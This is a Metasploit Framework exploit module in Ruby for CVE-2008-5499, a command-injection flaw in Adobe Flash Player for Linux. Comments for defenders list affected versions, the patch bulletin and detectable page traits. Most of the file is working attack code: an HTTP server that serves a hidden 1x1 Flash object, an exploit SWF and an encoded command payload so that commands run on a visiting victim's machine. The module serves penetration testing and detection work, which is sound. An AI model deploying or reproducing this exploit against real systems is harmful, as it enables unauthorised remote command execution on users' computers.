rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-delivered module for CVE-2008-5499 (Adobe bulletin APSB08-24).
#
# The module runs an HTTP server and answers every request in one of three ways,
# chosen only by a case-insensitive, unanchored substring match on the URI:
#   * URI contains ".swf" -> the prebuilt SWF read from the framework data directory
#   * URI contains ".txt" -> the encoded command payload, served as text/plain
#   * anything else       -> an HTML page embedding a 1x1 Flash object
#
# Reviewer notes for defenders:
#   * Affected builds, per the module description, are Flash Player for Linux
#     10.0.12.36 / 9.0.151.0 and earlier, and Adobe AIR must be installed.
#     Updating per APSB08-24 (or removing the plugin) closes the issue.
#   * Observable traits of the served page: a 1x1 <object>/<embed> pair whose
#     id/name and SWF file name are 3-8 random alphabetic characters.
#   * Responses default to gzip compression with chunked transfer encoding, so
#     content inspection has to decode both before matching on the body.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata (name, references, default options, targets).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
        'Description' => %q{
          This module exploits a vulnerability in Adobe Flash Player for Linux,
          version 10.0.12.36 and 9.0.151.0 and prior.
          An input validation vulnerability allows command execution when the browser
          loads a SWF file which contains shell metacharacters in the arguments to
          the ActionScript launch method.

          The victim must have Adobe AIR installed for the exploit to work. This module
          was tested against version 10.0.12.36 (10r12_36).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
        ],
        'References' => [
          ['CVE', '2008-5499'],
          ['OSVDB', '50796'],
          ['BID', '32896'],
          ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html']
        ],
        # HTTP server response options: gzip-compressed, chunked responses by default.
        'DefaultOptions' => {
          'HTTP::compression' => 'gzip',
          'HTTP::chunked' => true
        },
        'Platform' => 'unix', # so unix cmd exec payloads are ok
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['Automatic', {}]
        ],
        'DisclosureDate' => '2008-12-17',
        'DefaultTarget' => 0,
        # NOTE(review): CRASH_SERVICE_DOWN is declared here, but nothing in this
        # file shows what crashes; confirm against the SWF's behaviour.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
  end

  # Loads the prebuilt SWF into @swf, then hands control to the parent class.
  #
  # The SWF is read as raw bytes from <data_directory>/exploits/CVE-2008-5499.swf;
  # File.binread raises if that file is missing or unreadable.
  def exploit
    @swf = File.binread(
      File.join(Msf::Config.data_directory, 'exploits', 'CVE-2008-5499.swf')
    )

    super
  end

  # Answers one HTTP request from a connecting client.
  #
  # @param cli the client connection; its peerhost is used in the log prefix
  # @param request the HTTP request; only request.uri is inspected
  def on_request_uri(cli, request)
    log_prefix = "#{cli.peerhost.ljust(16)} #{shortname}"
    # Random names are generated on every request, in this order, even on the
    # branches below that return before using them.
    swf_name = "#{rand_text_alpha(3..8)}.swf"
    element_id = rand_text_alpha(3..8)

    # Unanchored match: ".swf" anywhere in the URI selects this branch.
    if request.uri.match?(/\.swf/i)
      print_status("#{log_prefix} Sending Exploit SWF")
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    # Presumably requested as a follow-up by the SWF; the SWF source is not in
    # this file, so that is not verifiable here. Served without a status line.
    if request.uri.match?(/\.txt/i)
      send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
      return
    end

    # Landing page: a 1x1 Flash object, declared through both <object> and
    # <embed>, pointing at the randomly named SWF under this module's resource.
    page = <<-HTML
    <html>
    <head>
    </head>
    <body>
    <center>
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{element_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{get_resource}#{swf_name}" />
    <embed src="#{get_resource}#{swf_name}" quality="high" width="1" height="1" name="#{element_id}" align="middle" allowNetworking="all"
    type="application/x-shockwave-flash"
    pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>

    </object>
    </center>

    </body>
    </html>
    HTML

    print_status("#{log_prefix} Sending HTML...")
    send_response(cli, page, { 'Content-Type' => 'text/html' })
  end
end